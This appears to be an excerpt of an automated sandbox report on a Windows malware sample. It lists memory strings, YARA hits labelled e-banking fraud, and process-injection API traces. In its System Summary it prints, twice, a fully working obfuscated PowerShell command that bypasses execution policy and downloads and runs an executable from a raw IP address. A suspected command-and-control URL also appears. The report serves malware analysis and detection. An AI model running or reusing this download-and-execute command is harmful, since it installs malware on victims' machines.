                        Source: csrss.exe, 0000000C.00000003.1285364956.000000007EED0000.00000004.00001000.00020000.00000000.sdmp, csrss.exe, 0000000C.00000003.1285255898.0000000003101000.00000004.00000020.00020000.00000000.sdmp, csrss.exe, 0000000C.00000002.1352057274.0000000021CA6000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://ocsp.digicert.com0C
                        Source: csrss.exe, 0000000C.00000003.1285364956.000000007EED0000.00000004.00001000.00020000.00000000.sdmp, csrss.exe, 0000000C.00000003.1285255898.0000000003101000.00000004.00000020.00020000.00000000.sdmp, csrss.exe, 0000000C.00000002.1352057274.0000000021CA6000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://ocsp.digicert.com0X
                        Source: powershell.exe, 00000003.00000002.1354721983.00000000051C7000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://pesterbdd.com/images/Pester.png
                        Source: csrss.exe, 0000000C.00000003.1285364956.000000007EED0000.00000004.00001000.00020000.00000000.sdmp, csrss.exe, 0000000C.00000003.1285255898.0000000003101000.00000004.00000020.00020000.00000000.sdmp, csrss.exe, 0000000C.00000002.1352057274.0000000021CA6000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://pki.eset.com/crl/csca2020.crl0I
                        Source: csrss.exe, 0000000C.00000003.1285364956.000000007EED0000.00000004.00001000.00020000.00000000.sdmp, csrss.exe, 0000000C.00000003.1285255898.0000000003101000.00000004.00000020.00020000.00000000.sdmp, csrss.exe, 0000000C.00000002.1352057274.0000000021CA6000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://pki.eset.com/crl/rootca2020.crl0?
                        Source: csrss.exe, 0000000C.00000003.1285364956.000000007EED0000.00000004.00001000.00020000.00000000.sdmp, csrss.exe, 0000000C.00000003.1285255898.0000000003101000.00000004.00000020.00020000.00000000.sdmp, csrss.exe, 0000000C.00000002.1352057274.0000000021CA6000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://pki.eset.com/crl/tsca2020.crl0?
                        Source: csrss.exe, 0000000C.00000003.1285364956.000000007EED0000.00000004.00001000.00020000.00000000.sdmp, csrss.exe, 0000000C.00000003.1285255898.0000000003101000.00000004.00000020.00020000.00000000.sdmp, csrss.exe, 0000000C.00000002.1352057274.0000000021CA6000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://pki.eset.com/crt/csca2020.crt05
                        Source: csrss.exe, 0000000C.00000003.1285364956.000000007EED0000.00000004.00001000.00020000.00000000.sdmp, csrss.exe, 0000000C.00000003.1285255898.0000000003101000.00000004.00000020.00020000.00000000.sdmp, csrss.exe, 0000000C.00000002.1352057274.0000000021CA6000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://pki.eset.com/crt/rootca2020.crt07
                        Source: csrss.exe, 0000000C.00000003.1285364956.000000007EED0000.00000004.00001000.00020000.00000000.sdmp, csrss.exe, 0000000C.00000003.1285255898.0000000003101000.00000004.00000020.00020000.00000000.sdmp, csrss.exe, 0000000C.00000002.1352057274.0000000021CA6000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://pki.eset.com/crt/tsca2020.crt05
                        Source: csrss.exe, 0000000C.00000003.1285364956.000000007EED0000.00000004.00001000.00020000.00000000.sdmp, csrss.exe, 0000000C.00000003.1285255898.0000000003101000.00000004.00000020.00020000.00000000.sdmp, csrss.exe, 0000000C.00000002.1352057274.0000000021CA6000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://pki.eset.com/csp0
                        Source: powershell.exe, 00000003.00000002.1354721983.00000000051C7000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/soap/encoding/
                        Source: powershell.exe, 00000003.00000002.1354721983.0000000005071000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
                        Source: powershell.exe, 00000003.00000002.1354721983.00000000051C7000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/wsdl/
                        Source: 4nHrKBXqqqVJFZFp.exe, 00000016.00000002.3629881400.00000000053C7000.00000040.80000000.00040000.00000000.sdmpString found in binary or memory: http://www.031233793.xyz
                        Source: 4nHrKBXqqqVJFZFp.exe, 00000016.00000002.3629881400.00000000053C7000.00000040.80000000.00040000.00000000.sdmpString found in binary or memory: http://www.031233793.xyz/63vw/
                        Source: powershell.exe, 00000003.00000002.1354721983.00000000051C7000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0.html
                        Source: csrss.exe, 0000000C.00000003.1285364956.000000007EED0000.00000004.00001000.00020000.00000000.sdmp, csrss.exe, 0000000C.00000003.1285255898.0000000003101000.00000004.00000020.00020000.00000000.sdmp, csrss.exe, 0000000C.00000002.1352057274.0000000021CA6000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://www.digicert.com/CPS0
                        Source: csrss.exe, 0000000C.00000003.1284464034.000000007EBB9000.00000004.00001000.00020000.00000000.sdmp, csrss.exe, 0000000C.00000002.1354702369.0000000021EFE000.00000004.00001000.00020000.00000000.sdmp, csrss.exe, 0000000C.00000003.1286992439.0000000000889000.00000004.00000020.00020000.00000000.sdmp, csrss.exe, 0000000C.00000003.1284464034.000000007EB60000.00000004.00001000.00020000.00000000.sdmp, csrss.exe, 0000000C.00000002.1357966873.000000007F039000.00000004.00001000.00020000.00000000.sdmp, csrss.exe, 0000000C.00000002.1297030622.0000000002DC3000.00000004.00001000.00020000.00000000.sdmp, iaoqralA.pif, 00000011.00000000.1287327229.0000000000416000.00000002.00000001.01000000.0000000D.sdmp, iaoqralA.pif, 00000011.00000002.1552868362.00000000008E9000.00000040.00000400.00020000.00000000.sdmp, systeminfo.exe, 00000015.00000002.3629285159.00000000048FC000.00000004.10000000.00040000.00000000.sdmp, systeminfo.exe, 00000015.00000002.3625591179.0000000002499000.00000004.00000020.00020000.00000000.sdmp, 4nHrKBXqqqVJFZFp.exe, 00000016.00000002.3628090951.0000000002F2C000.00000004.00000001.00040000.00000000.sdmp, firefox.exe, 00000017.00000002.1850984943.000000002A91C000.00000004.80000000.00040000.00000000.sdmp, iaoqralA.pif.12.drString found in binary or memory: http://www.pmail.com
                        Source: systeminfo.exe, 00000015.00000003.1745769006.000000000732E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://ac.ecosia.org?q=
                        Source: powershell.exe, 00000003.00000002.1354721983.0000000005071000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://aka.ms/pscore6lB
                        Source: powershell.exe, 00000003.00000002.1354721983.00000000051C7000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://aka.ms/winsvr-2022-pshelp
                        Source: systeminfo.exe, 00000015.00000003.1745769006.000000000732E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=
                        Source: systeminfo.exe, 00000015.00000003.1745769006.000000000732E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/search
                        Source: systeminfo.exe, 00000015.00000003.1745769006.000000000732E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=
                        Source: powershell.exe, 00000003.00000002.1374373763.00000000060D7000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://contoso.com/
                        Source: powershell.exe, 00000003.00000002.1374373763.00000000060D7000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://contoso.com/Icon
                        Source: powershell.exe, 00000003.00000002.1374373763.00000000060D7000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://contoso.com/License
                        Source: systeminfo.exe, 00000015.00000003.1745769006.000000000732E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://duckduckgo.com/ac/?q=
                        Source: systeminfo.exe, 00000015.00000003.1745769006.000000000732E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://duckduckgo.com/chrome_newtabv20
                        Source: systeminfo.exe, 00000015.00000003.1745769006.000000000732E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=
                        Source: svchost.exe, 00000004.00000003.1203868224.000001E5BD8C2000.00000004.00000800.00020000.00000000.sdmp, qmgr.db.4.dr, edb.log.4.drString found in binary or memory: https://g.live.com/1rewlive5skydrive/OneDriveProductionV2?OneDriveUpdate=9c123752e31a927b78dc96231b6
                        Source: edb.log.4.drString found in binary or memory: https://g.live.com/odclientsettings/Prod.C:
                        Source: edb.log.4.drString found in binary or memory: https://g.live.com/odclientsettings/ProdV2
                        Source: edb.log.4.drString found in binary or memory: https://g.live.com/odclientsettings/ProdV2.C:
                        Source: svchost.exe, 00000004.00000003.1203868224.000001E5BD8C2000.00000004.00000800.00020000.00000000.sdmp, edb.log.4.drString found in binary or memory: https://g.live.com/odclientsettings/ProdV2?OneDriveUpdate=f359a5df14f97b6802371976c96
                        Source: systeminfo.exe, 00000015.00000003.1745769006.000000000732E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://gemini.google.com/app?q=
                        Source: powershell.exe, 00000003.00000002.1354721983.00000000051C7000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://github.com/Pester/Pester
                        Source: systeminfo.exe, 00000015.00000002.3625591179.00000000024DB000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/oauth20_authorize.srfclient_id=00000000480728C5&scope=service::ssl.live.com::
                        Source: systeminfo.exe, 00000015.00000002.3625591179.00000000024DB000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/oauth20_desktop.srf?lc=1033
                        Source: systeminfo.exe, 00000015.00000002.3625591179.00000000024BA000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/oauth20_desktop.srflc=1033s;
                        Source: systeminfo.exe, 00000015.00000002.3625591179.00000000024BA000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/oauth20_logout.srfclient_id=00000000480728C5&redirect_uri=https://login.live.
                        Source: systeminfo.exe, 00000015.00000003.1736742288.000000000730D000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/oauth20_logout.srfhttps://login.live.com/oauth20_authorize.srfhttps://login.l
                        Source: powershell.exe, 00000003.00000002.1381364951.000000000792F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com64/WindowsPowerShell/v1.0/Author=
                        Source: powershell.exe, 00000003.00000002.1374373763.00000000060D7000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://nuget.org/nuget.exe
                        Source: svchost.exe, 00000004.00000003.1203868224.000001E5BD8C2000.00000004.00000800.00020000.00000000.sdmp, qmgr.db.4.dr, edb.log.4.drString found in binary or memory: https://oneclient.sfx.ms/Win/Installers/23.194.0917.0001/amd64/OneDriveSetup.exe
                        Source: edb.log.4.drString found in binary or memory: https://oneclient.sfx.ms/Win/Prod/21.220.1024.0005/OneDriveSetup.exe.C:
                        Source: systeminfo.exe, 00000015.00000003.1745769006.000000000732E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.ecosia.org/newtab/v20
                        Source: systeminfo.exe, 00000015.00000003.1745769006.000000000732E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.google.com/images/branding/product/ico/googleg_alldp.ico

                        E-Banking Fraud

                        barindex
                        Source: Yara matchFile source: 17.2.iaoqralA.pif.400000.1.raw.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 17.2.iaoqralA.pif.400000.1.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 00000016.00000002.3629881400.0000000005360000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
                        Source: Yara matchFile source: 00000015.00000002.3625364823.0000000002400000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
                        Source: Yara matchFile source: 00000015.00000002.3627870487.0000000004070000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                        Source: Yara matchFile source: 00000015.00000002.3627956403.00000000040C0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                        Source: Yara matchFile source: 00000011.00000002.1583072891.0000000035BE0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
                        Source: Yara matchFile source: 00000011.00000002.1552868362.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
                        Source: Yara matchFile source: 00000014.00000002.3628025430.0000000002940000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
                        Source: Yara matchFile source: 00000011.00000002.1579411162.00000000311A0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY

                        System Summary

                        barindex
                        Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe POwershELl.ExE -EX BypasS -nOp -W 1 -c DEVICeCrEDEnTIALdEPLoyMeNT.Exe ; iex($(iEX('[SyStem.tExt.ENCOdInG]'+[ChAR]0X3A+[ChAR]58+'Utf8.getsTRing([sYsTEm.CONveRt]'+[chAR]58+[cHaR]58+'FROmbasE64string('+[Char]34+'JGMxS3luICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgPSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIGFkRC10WVBFICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLU1lTWJlcmRFRklOaXRJT04gICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAnW0RsbEltcG9ydCgiVVJsbW9OLkRsbCIsICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgQ2hhclNldCA9IENoYXJTZXQuVW5pY29kZSldcHVibGljIHN0YXRpYyBleHRlcm4gSW50UHRyIFVSTERvd25sb2FkVG9GaWxlKEludFB0ciAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIERock8sc3RyaW5nICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgeGpiLHN0cmluZyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIFIsdWludCAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIHR1LEludFB0ciAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIEJnaVNLZHFIUUUpOycgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAtbkFtZSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICJZT2giICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLU5BTUVzcGFDRSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIHhaUFogICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAtUGFzc1RocnU7ICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgJGMxS3luOjpVUkxEb3dubG9hZFRvRmlsZSgwLCJodHRwOi8vMTkyLjMuMjYuMTQzLzQ3MC9jc3Jzcy5leGUiLCIkRW52OkFQUERBVEFcY3Nyc3MuZXhlIiwwLDApO1N0YVJULXNsZWVQKDMpO2luVk9LRS1JdEVtICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIiRlTnY6QVBQREFUQVxjc3Jzcy5leGUi'+[cHaR]0x22+'))')))"
                        Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe POwershELl.ExE -EX BypasS -nOp -W 1 -c DEVICeCrEDEnTIALdEPLoyMeNT.Exe ; iex($(iEX('[SyStem.tExt.ENCOdInG]'+[ChAR]0X3A+[ChAR]58+'Utf8.getsTRing([sYsTEm.CONveRt]'+[chAR]58+[cHaR]58+'FROmbasE64string('+[Char]34+'JGMxS3luICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgPSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIGFkRC10WVBFICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLU1lTWJlcmRFRklOaXRJT04gICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAnW0RsbEltcG9ydCgiVVJsbW9OLkRsbCIsICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgQ2hhclNldCA9IENoYXJTZXQuVW5pY29kZSldcHVibGljIHN0YXRpYyBleHRlcm4gSW50UHRyIFVSTERvd25sb2FkVG9GaWxlKEludFB0ciAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIERock8sc3RyaW5nICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgeGpiLHN0cmluZyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIFIsdWludCAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIHR1LEludFB0ciAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIEJnaVNLZHFIUUUpOycgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAtbkFtZSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICJZT2giICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLU5BTUVzcGFDRSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIHhaUFogICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAtUGFzc1RocnU7ICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgJGMxS3luOjpVUkxEb3dubG9hZFRvRmlsZSgwLCJodHRwOi8vMTkyLjMuMjYuMTQzLzQ3MC9jc3Jzcy5leGUiLCIkRW52OkFQUERBVEFcY3Nyc3MuZXhlIiwwLDApO1N0YVJULXNsZWVQKDMpO2luVk9LRS1JdEVtICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIiRlTnY6QVBQREFUQVxjc3Jzcy5leGUi'+[cHaR]0x22+'))')))"Jump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\ZVZFKMB9\csrss[1].exeJump to dropped file
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile created: C:\Users\user\AppData\Roaming\csrss.exeJump to dropped file
                        Source: C:\Users\user\AppData\Roaming\csrss.exeCode function: 12_2_03813208 NtAllocateVirtualMemory,12_2_03813208
                        Source: C:\Users\user\AppData\Roaming\csrss.exeCode function: 12_2_0381A190 RtlDosPathNameToNtPathName_U,NtOpenFile,NtQueryInformationFile,NtReadFile,NtClose,12_2_0381A190
                        Source: C:\Users\user\AppData\Roaming\csrss.exeCode function: 12_2_0381A0AC RtlDosPathNameToNtPathName_U,NtCreateFile,NtWriteFile,NtClose,12_2_0381A0AC
                        Source: C:\Users\user\AppData\Roaming\csrss.exeCode function: 12_2_0381A024 RtlInitUnicodeString,RtlDosPathNameToNtPathName_U,NtDeleteFile,12_2_0381A024
                        Source: C:\Users\user\AppData\Roaming\csrss.exeCode function: 12_2_03815634 GetThreadContext,Wow64GetThreadContext,SetThreadContext,Wow64SetThreadContext,NtResumeThread,12_2_03815634
                        Source: C:\Users\user\AppData\Roaming\csrss.exeCode function: 12_2_03813554 NtWriteVirtualMemory,12_2_03813554
                        Source: C:\Users\user\AppData\Roaming\csrss.exeCode function: 12_2_03813AA8 NtReadVirtualMemory,12_2_03813AA8
                        Source: C:\Users\user\AppData\Roaming\csrss.exeCode function: 12_2_03813D18 NtUnmapViewOfSection,12_2_03813D18
                        Source: C:\Users\user\AppData\Roaming\csrss.exeCode function: 12_2_03813206 NtAllocateVirtualMemory,12_2_03813206
                        Source: C:\Users\user\AppData\Roaming\csrss.exeCode function: 12_2_03815632 GetThreadContext,Wow64GetThreadContext,SetThreadContext,Wow64SetThreadContext,NtResumeThread,12_2_03815632
                        Source: C:\Users\user\AppData\Roaming\csrss.exeCode function: 12_2_03819FD0 RtlInitUnicodeString,RtlDosPathNameToNtPathName_U,NtDeleteFile,12_2_03819FD0
                        Source: C:\Users\user\Links\iaoqralA.pifCode function: 17_2_0042C663 NtClose,17_2_0042C663
                        Source: C:\Users\user\Links\iaoqralA.pifCode function: 17_2_30CC35C0 NtCreateMutant,LdrInitializeThunk,17_2_30CC35C0
                        Source: C:\Users\user\Links\iaoqralA.pifCode function: 17_2_30CC2B60 NtClose,LdrInitializeThunk,17_2_30CC2B60
                        Source: C:\Users\user\Links\iaoqralA.pifCode function: 17_2_30CC2C70 NtFreeVirtualMemory,LdrInitializeThunk,17_2_30CC2C70
                        Source: C:\Users\user\Links\iaoqralA.pifCode function: 17_2_30CC2DF0 NtQuerySystemInformation,LdrInitializeThunk,17_2_30CC2DF0
                        Source: C:\Users\user\Links\iaoqralA.pifCode function: 17_2_30CC3090 NtSetValueKey,17_2_30CC3090
                        Source: C:\Users\user\Links\iaoqralA.pifCode function: 17_2_30CC3010 NtOpenDirectoryObject,17_2_30CC3010
                        Source: C:\Users\user\Links\iaoqralA.pifCode function: 17_2_30CC4340 NtSetContextThread,17_2_30CC4340
                        Source: C:\Users\user\Links\iaoqralA.pifCode function: 17_2_30CC4650 NtSuspendThread,17_2_30CC4650
                        Source: C:\Users\user\Links\iaoqralA.pifCode function: 17_2_30CC39B0 NtGetContextThread,17_2_30CC39B0
                        Source: C:\Users\user\Links\iaoqralA.pifCode function: 17_2_30CC2AD0 NtReadFile,17_2_30CC2AD0
                        Source: C:\Users\user\Links\iaoqralA.pifCode function: 17_2_30CC2AF0 NtWriteFile,17_2_30CC2AF0
                        Source: C:\Users\user\Links\iaoqralA.pifCode function: 17_2_30CC2AB0 NtWaitForSingleObject,17_2_30CC2AB0
                        Source: C:\Users\user\Links\iaoqralA.pifCode function: 17_2_30CC2BE0 NtQueryValueKey,17_2_30CC2BE0
                        Source: C:\Users\user\Links\iaoqralA.pifCode function: 17_2_30CC2BF0 NtAllocateVirtualMemory,17_2_30CC2BF0
                        Source: C:\Users\user\Links\iaoqralA.pifCode function: 17_2_30CC2B80 NtQueryInformationFile,17_2_30CC2B80
                        Source: C:\Users\user\Links\iaoqralA.pifCode function: 17_2_30CC2BA0 NtEnumerateValueKey,17_2_30CC2BA0
                        Source: C:\Users\user\Links\iaoqralA.pifCode function: 17_2_30CC2CC0 NtQueryVirtualMemory,17_2_30CC2CC0
                        Source: C:\Users\user\Links\iaoqralA.pifCode function: 17_2_30CC2CF0 NtOpenProcess,17_2_30CC2CF0
                        Source: C:\Users\user\Links\iaoqralA.pifCode function: 17_2_30CC2CA0 NtQueryInformationToken,17_2_30CC2CA0
                        Source: C:\Users\user\Links\iaoqralA.pifCode function: 17_2_30CC2C60 NtCreateKey,17_2_30CC2C60
                        Source: C:\Users\user\Links\iaoqralA.pifCode function: 17_2_30CC2C00 NtQueryInformationProcess,17_2_30CC2C00
                        Source: C:\Users\user\Links\iaoqralA.pifCode function: 17_2_30CC2DD0 NtDelayExecution,17_2_30CC2DD0
                        Source: C:\Users\user\Links\iaoqralA.pifCode function: 17_2_30CC2DB0 NtEnumerateKey,17_2_30CC2DB0
                        Source: C:\Users\user\Links\iaoqralA.pifCode function: 17_2_30CC3D70 NtOpenThread,17_2_30CC3D70
                        Source: C:\Users\user\Links\iaoqralA.pifCode function: 17_2_30CC2D00 NtSetInformationFile,17_2_30CC2D00
                        Source: C:\Users\user\Links\iaoqralA.pifCode function: 17_2_30CC3D10 NtOpenProcessToken,17_2_30CC3D10
                        Source: C:\Users\user\Links\iaoqralA.pifCode function: 17_2_30CC2D10 NtMapViewOfSection,17_2_30CC2D10
                        Source: C:\Users\user\Links\iaoqralA.pifCode function: 17_2_30CC2D30 NtUnmapViewOfSection,17_2_30CC2D30
                        Source: C:\Users\user\Links\iaoqralA.pifCode function: 17_2_30CC2EE0 NtQueueApcThread,17_2_30CC2EE0
                        Source: C:\Users\user\Links\iaoqralA.pifCode function: 17_2_30CC2E80 NtReadVirtualMemory,17_2_30CC2E80
                        Source: C:\Users\user\Links\iaoqralA.pifCode function: 17_2_30CC2EA0 NtAdjustPrivilegesToken,17_2_30CC2EA0
                        Source: C:\Users\user\Links\iaoqralA.pifCode function: 17_2_30CC2E30 NtWriteVirtualMemory,17_2_30CC2E30
                        Source: C:\Users\user\Links\iaoqralA.pifCode function: 17_2_30CC2FE0 NtCreateFile,17_2_30CC2FE0
                        Source: C:\Users\user\Links\iaoqralA.pifCode function: 17_2_30CC2F90 NtProtectVirtualMemory,17_2_30CC2F90
                        Source: C:\Users\user\Links\iaoqralA.pifCode function: 17_2_30CC2FA0 NtQuerySection,17_2_30CC2FA0
                        Source: C:\Users\user\Links\iaoqralA.pifCode function: 17_2_30CC2FB0 NtResumeThread,17_2_30CC2FB0
                        Source: C:\Users\user\Links\iaoqralA.pifCode function: 17_2_30CC2F60 NtCreateProcessEx,17_2_30CC2F60
                        Source: C:\Users\user\Links\iaoqralA.pifCode function: 17_2_30CC2F30 NtCreateSection,17_2_30CC2F30
                        Source: C:\Windows\SysWOW64\systeminfo.exeCode function: 21_2_043435C0 NtCreateMutant,LdrInitializeThunk,21_2_043435C0
                        Source: C:\Windows\SysWOW64\systeminfo.exeCode function: 21_2_04344650 NtSuspendThread,LdrInitializeThunk,21_2_04344650
                        Source: C:\Windows\SysWOW64\systeminfo.exeCode function: 21_2_04344340 NtSetContextThread,LdrInitializeThunk,21_2_04344340
                        Source: C:\Windows\SysWOW64\systeminfo.exeCode function: 21_2_04342C70 NtFreeVirtualMemory,LdrInitializeThunk,21_2_04342C70
                        Source: C:\Windows\SysWOW64\systeminfo.exeCode function: 21_2_04342C60 NtCreateKey,LdrInitializeThunk,21_2_04342C60
                        Source: C:\Windows\SysWOW64\systeminfo.exeCode function: 21_2_04342CA0 NtQueryInformationToken,LdrInitializeThunk,21_2_04342CA0
                        Source: C:\Windows\SysWOW64\systeminfo.exeCode function: 21_2_04342D30 NtUnmapViewOfSection,LdrInitializeThunk,21_2_04342D30
                        Source: C:\Windows\SysWOW64\systeminfo.exeCode function: 21_2_04342D10 NtMapViewOfSection,LdrInitializeThunk,21_2_04342D10
                        Source: C:\Windows\SysWOW64\systeminfo.exeCode function: 21_2_04342DF0 NtQuerySystemInformation,LdrInitializeThunk,21_2_04342DF0
                        Source: C:\Windows\SysWOW64\systeminfo.exeCode function: 21_2_04342DD0 NtDelayExecution,LdrInitializeThunk,21_2_04342DD0
                        Source: C:\Windows\SysWOW64\systeminfo.exeCode function: 21_2_04342E80 NtReadVirtualMemory,LdrInitializeThunk,21_2_04342E80
                        Source: C:\Windows\SysWOW64\systeminfo.exeCode function: 21_2_04342EE0 NtQueueApcThread,LdrInitializeThunk,21_2_04342EE0
                        Source: C:\Windows\SysWOW64\systeminfo.exeCode function: 21_2_04342F30 NtCreateSection,LdrInitializeThunk,21_2_04342F30
                        Source: C:\Windows\SysWOW64\systeminfo.exeCode function: 21_2_04342FB0 NtResumeThread,LdrInitializeThunk,21_2_04342FB0
                        Source: C:\Windows\SysWOW64\systeminfo.exeCode function: 21_2_04342FE0 NtCreateFile,LdrInitializeThunk,21_2_04342FE0
                        Source: C:\Windows\SysWOW64\systeminfo.exeCode function: 21_2_043439B0 NtGetContextThread,LdrInitializeThunk,21_2_043439B0
                        Source: C:\Windows\SysWOW64\systeminfo.exeCode function: 21_2_04342AF0 NtWriteFile,LdrInitializeThunk,21_2_04342AF0
                        Source: C:\Windows\SysWOW64\systeminfo.exeCode function: 21_2_04342AD0 NtReadFile,LdrInitializeThunk,21_2_04342AD0
                        Source: C:\Windows\SysWOW64\systeminfo.exeCode function: 21_2_04342B60 NtClose,LdrInitializeThunk,21_2_04342B60
                        Source: C:\Windows\SysWOW64\systeminfo.exeCode function: 21_2_04342BA0 NtEnumerateValueKey,LdrInitializeThunk,21_2_04342BA0
                        Source: C:\Windows\SysWOW64\systeminfo.exeCode function: 21_2_04342BF0 NtAllocateVirtualMemory,LdrInitializeThunk,21_2_04342BF0
                        Source: C:\Windows\SysWOW64\systeminfo.exeCode function: 21_2_04342BE0 NtQueryValueKey,LdrInitializeThunk,21_2_04342BE0
                        Source: C:\Windows\SysWOW64\systeminfo.exeCode function: 21_2_04343010 NtOpenDirectoryObject,21_2_04343010
                        Source: C:\Windows\SysWOW64\systeminfo.exeCode function: 21_2_04343090 NtSetValueKey,21_2_04343090
                        Source: C:\Windows\SysWOW64\systeminfo.exeCode function: 21_2_04342C00 NtQueryInformationProcess,21_2_04342C00
                        Source: C:\Windows\SysWOW64\systeminfo.exeCode function: 21_2_04342CF0 NtOpenProcess,21_2_04342CF0
                        Source: C:\Windows\SysWOW64\systeminfo.exeCode function: 21_2_04342CC0 NtQueryVirtualMemory,21_2_04342CC0
                        Source: C:\Windows\SysWOW64\systeminfo.exeCode function: 21_2_04343D10 NtOpenProcessToken,21_2_04343D10
                        Source: C:\Windows\SysWOW64\systeminfo.exeCode function: 21_2_04342D00 NtSetInformationFile,21_2_04342D00
                        Source: C:\Windows\SysWOW64\systeminfo.exeCode function: 21_2_04343D70 NtOpenThread,21_2_04343D70
                        Source: C:\Windows\SysWOW64\systeminfo.exeCode function: 21_2_04342DB0 NtEnumerateKey,21_2_04342DB0
                        Source: C:\Windows\SysWOW64\systeminfo.exeCode function: 21_2_04342E30 NtWriteVirtualMemory,21_2_04342E30
                        Source: C:\Windows\SysWOW64\systeminfo.exeCode function: 21_2_04342EA0 NtAdjustPrivilegesToken,21_2_04342EA0
                        Source: C:\Windows\SysWOW64\systeminfo.exeCode function: 21_2_04342F60 NtCreateProcessEx,21_2_04342F60
                        Source: C:\Windows\SysWOW64\systeminfo.exeCode function: 21_2_04342FA0 NtQuerySection,21_2_04342FA0
                        Source: C:\Windows\SysWOW64\systeminfo.exeCode function: 21_2_04342F90 NtProtectVirtualMemory,21_2_04342F90
